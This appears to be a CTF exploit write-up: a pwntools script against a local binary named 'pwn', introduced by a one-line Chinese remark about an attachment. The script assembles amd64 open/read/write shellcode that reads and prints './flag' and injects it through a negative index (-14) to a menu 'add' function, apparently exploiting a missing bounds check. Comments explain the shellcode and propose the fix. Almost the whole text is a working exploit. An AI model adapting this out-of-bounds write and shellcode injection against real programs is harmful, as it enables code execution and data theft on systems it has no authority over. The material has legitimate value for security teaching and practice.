exp

附件放下边了

#!/usr/bin/env python
from pwn import *

# Global pwntools settings: verbose tube logging, plus the amd64/linux target
# that asm() assembles for further down.
context.update(log_level='debug', arch='amd64', os='linux')

# Start the challenge binary from the current directory as a local child
# process; the add()/delete() helpers talk to it through this tube.
p = process("./pwn")

def add(index, size, content):
    """Drive menu option "1" of the target and answer its three prompts.

    Waits for the menu banner, selects option 1, then replies to the
    "index:", "size:" and "content:" prompts in that order. Every value is
    passed through str() before being sent, one line per prompt.

    NOTE(review): str(content) assumes Python 2 string semantics; under
    Python 3 a bytes argument would be sent as its repr (b'...') - confirm
    which interpreter this script is run with.
    """
    p.recvuntil("choice >>\n")
    p.sendline("1")
    answers = (
        ("index:\n", index),
        ("size:\n", size),
        ("content:\n", content),
    )
    for prompt, value in answers:
        p.recvuntil(prompt)
        p.sendline(str(value))
def delete(index):
    """Drive menu option "4" of the target for the given slot index.

    Waits for the menu banner, selects option 4, then answers the "index:"
    prompt with str(index).
    """
    menu_banner = "choice >>\n"
    index_prompt = "index:\n"

    p.recvuntil(menu_banner)
    p.sendline("4")
    p.recvuntil(index_prompt)
    p.sendline(str(index))


# Hand-written amd64 assembly source. As its own /* ... */ labels say, it
# issues three raw syscalls: open (rax=2) on the path pushed onto the stack
# (0x67616c662f2e is the little-endian encoding of "./flag"), read (rax=0) of
# up to 0x80 bytes into that same stack slot, and write (rax=1) of the bytes
# actually read to fd 1.
orw_source = '''
/* open */
mov rdi,0x67616c662f2e
push rdi
mov r10,rsp
mov rdi,rsp
xor rsi,rsi
xor rdx,rdx
mov rax,2
syscall
/* read */
mov rdi,rax
mov rsi,r10
mov rdx,0x80
mov rax,0
syscall
/* write */
mov rdi,1
mov rsi,r10
mov rdx,rax
mov rax,1
syscall
'''

# Assemble the source for the architecture configured in `context`.
payload = asm(orw_source)

# NOTE(review): the index passed here is negative and the size is 0.
# Presumably the target's "add" handler uses the index without a lower-bound
# check, so the write lands outside its table - the page does not show the
# binary, so confirm. On the target side the fix is to reject any index
# outside the table's range (and any non-positive size) before using it.
add(-14, 0, payload)

# Select menu option 1 once more, then hand the session over to the terminal.
p.recvuntil("choice >>\n")
p.sendline("1")
p.interactive()

Attachment